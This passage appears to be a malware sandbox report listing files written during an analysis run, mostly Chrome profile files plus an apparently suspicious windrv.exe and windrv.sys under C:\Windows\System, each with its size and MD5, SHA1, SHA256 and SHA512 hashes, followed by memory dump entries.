30e12403251958fa65df62ec12e046b2c7e3ab7102f1bba742a00cb578b5710b91cec6f599c16ed9dcfa8b99eef59a630418b5940d4477e50a0a1defcdd63f4f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
b4fb0d26723395eff701e17fb8905bc6

SHA1
04275e5d55a3bf1b8ba8ac65262767d864e19e8e

SHA256
3727e8573f19be3e4e938bcbbb2ce66f2fe9ebc4a0743356ca2fe851282c7084

SHA512
0d4abf5a8fe5b5b18ab18b9d3192ac9b0a9c2aa79409754475598fcd1397ad9641cd05c8228abc8ab097785e4a0d84559fb8de8c89153c70cfb0f0415d3816bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
ef6bdb429f5d88023f56d01c407ad8ad

SHA1
66045982bcf4aeefe9228bb617158ba1042d6aff

SHA256
e39f40b39986ae0b7e496bc4198ddb633a9a9b2d0bc9eb60edd7a6d1e3565754

SHA512
34493a509e7a17d2bd0effbdb78fe4b43f51f8f9a61e19b51715cf87fd14e17357fbf4575bcea6130d34a6481d7a3d128ab000034b8b5ef6ba130a93ac7dc838

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
630390c4424d15d51e744774c4fa0ea0

SHA1
3ac6168907cf447bb957b59d18cf3f52cf140722

SHA256
a32cdce4a4779b61364b7d756eb9504430efd50d65d4864bed3e927904363066

SHA512
bdefe95f44921825bd88154673a288ae6fc9e2d7a161d44587d2d8510e906eaf01ca59469b164eaeeee7d8dc2c9719800e4b351a001fb1bc71af46045821a7c0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ab66e1260206f1dbf9cdfa6b718981ab

SHA1
527424f6074b474e7f87fe122fd36299266866f4

SHA256
6bd83ab13bad88f6ef3d730279fa35a3a09c751a23f409872fd400d1c812b9fd

SHA512
5692f85ae80fa51ce77b52d384e8cc805eabc76fb8df0d44393bd5f20854f72296cbfec572ed911f8ef80640a0c725fea081e850e8a94fc13c1cc0c3c1528c5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
3f24f1a196a71e3c25d639d77783c021

SHA1
9edabe428528a2d0cc6425d4eda11f32eec4a0d3

SHA256
a94efa8882d64496dab1b642e5eb607d4ad0ece85dec5330bbc50c0f74d59c1a

SHA512
1336a5158bce2103ddc2f23cec8e51178d4aa7fe254f0c2d097f3160c18b34e3d16c63dbe7f57ac623cbab8c1a80dbe1e03346436addd277e99eb36b8665531b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
f0af431ed3a1fd0aa4226cbe28181bf3

SHA1
b692369cfb483c607cc1cb3e4fd88845793fecff

SHA256
4eb5a6c866247199ab067a9c4d4bb466c198286f47ebaf9d1413082e645e95d6

SHA512
62bcfbcfba8b53b18b5efad26d90f8498f582f57f1b2fac3cbbdd15e1d43f0534cff7155e3d34118d1e2ce603765bb6d1e2fc9e76fcf45f9001cccab3e1cdf18

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5f821c0d657abd7ddf7e3d5a15744d89

SHA1
27577838d1678d42a577e7285cce43b0bdd6f2c2

SHA256
ef44cc76d30ddfe792e8327db2278154814c2f5001038143000c26de7cc960e8

SHA512
7baa05b484e531fa229f4b02460f89e3a732d9b5aea3a4f1466a14a8f11ac892a30f5ad5f27ac4a783b85f909c156c2d0ae0d93bf4502606c91cbf9789defe08

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6272ef07301e5cc50b4a48354fb245ec

SHA1
477e35b663ece9a930842f94ca31bf90d09b2606

SHA256
b18fde68a616f541de6ee34ff91a26e6bb2544dbd3b69626c9539c8e4d00e506

SHA512
4167b39254c7faa926351d8f8e3101063088e16b7241a2836d0d899252c43723427395aed3d9bc79dadbc38c0c18535f2bc9e06be664bd41dc3f824a63080a03

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
141711452cd1722ecce8419fd086eae3

SHA1
7ea106dd16d16a91290888179fbb1d8a88aa9964

SHA256
5e5c97ae5e72f8727b7383596721d628c350a4d1cca4938967118386e167fb14

SHA512
56e5c7c7c03ab82a4cb19f8435c0aa1c369368d0abffcf06ade35e9c5e0061feecf1dd0f327ebdb268bcb1839b364ec176c0ce02766e078f6161d7b9eeaa5854

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
57b5e54f4458ca394c7b0d27dba0d492

SHA1
f8f559405e16ce337f61a8ab50b618142742e001

SHA256
4723a60a5272437f81c2a6f56e25752910c68d53f9bc0ca46de9c713d02e183e

SHA512
7799f9b6af515b36c2460c0b37c1247ab73692f5da3fb4818ca299f319e7537088841558636db96a3edba4ae3cc0d7f99e8c16b093234e0f9aeb457b73e908d2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
2a96e59b0e8a78ce3e4bbdfa299a824c

SHA1
47f8e591a7df7401dee1a5c3200f39cc500e70c8

SHA256
791afdf9cd5a25e07341e5c220ed756c93c386ba65aad0f9b99bda03da4c48f6

SHA512
0ebf6b971ef23f20ebd5900ed5e9e49db38b9f743470a9a9713cd9f577c7675a30cb2892e3df6d50874937b43bf989c570e7f385649e85752a9f39a1e1156167

Download Submit
C:\Windows\System\windrv.exe

Filesize
534KB

MD5
cd4d08af76e7614f46bc853cf82cebc6

SHA1
94e75dac14976227c1c33ae48866e820db52aa1a

SHA256
f03d6b156974af96b66b3913bbcdf49609720f37f2e69c4222c2d0920f442f58

SHA512
b24396f3973156d8aef58203a0bcf1d542362e8591509e054488d6562fcf60e3cd628db0252a45ead220b4c7e82f065092e8a6145fcbfc399b4ca86f17084d99

Download Submit
C:\Windows\System\windrv.sys

Filesize
33KB

MD5
5acf19f7b19307196826e6d7d03b0c70

SHA1
e6f2035ea42d39801c67b01b5bbb8896097f39be

SHA256
d6fbd34ae93aec97fc5118d468ff663d5522d1c293c1df1e899cfc83525369f1

SHA512
06493c4ee12a002b6dbc6b2bd165ada71f73e09ca7a9a74c4ef393cb7897b4053dc5e4f136043e8dcac301d84ca8691811d1d75453e808a097ebc62c83ebc8f0

Download Submit
\??\pipe\crashpad_3908_MWYBWYELIHSFDISJ

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2428-20-0x00007FF64A370000-0x00007FF64A423000-memory.dmp

Filesize
716KB

Download
memory/2428-17-0x00007FF64A370000-0x00007FF64A423000-memory.dmp

Filesize
716KB

Download
memory/4548-13-0x00007FF687430000-0x00007FF6874E3000-memory.dmp

Filesize
716KB

Download
memory/4548-9-0x00007FF687430000-0x00007FF6874E3000-memory.dmp

Filesize
716KB

Download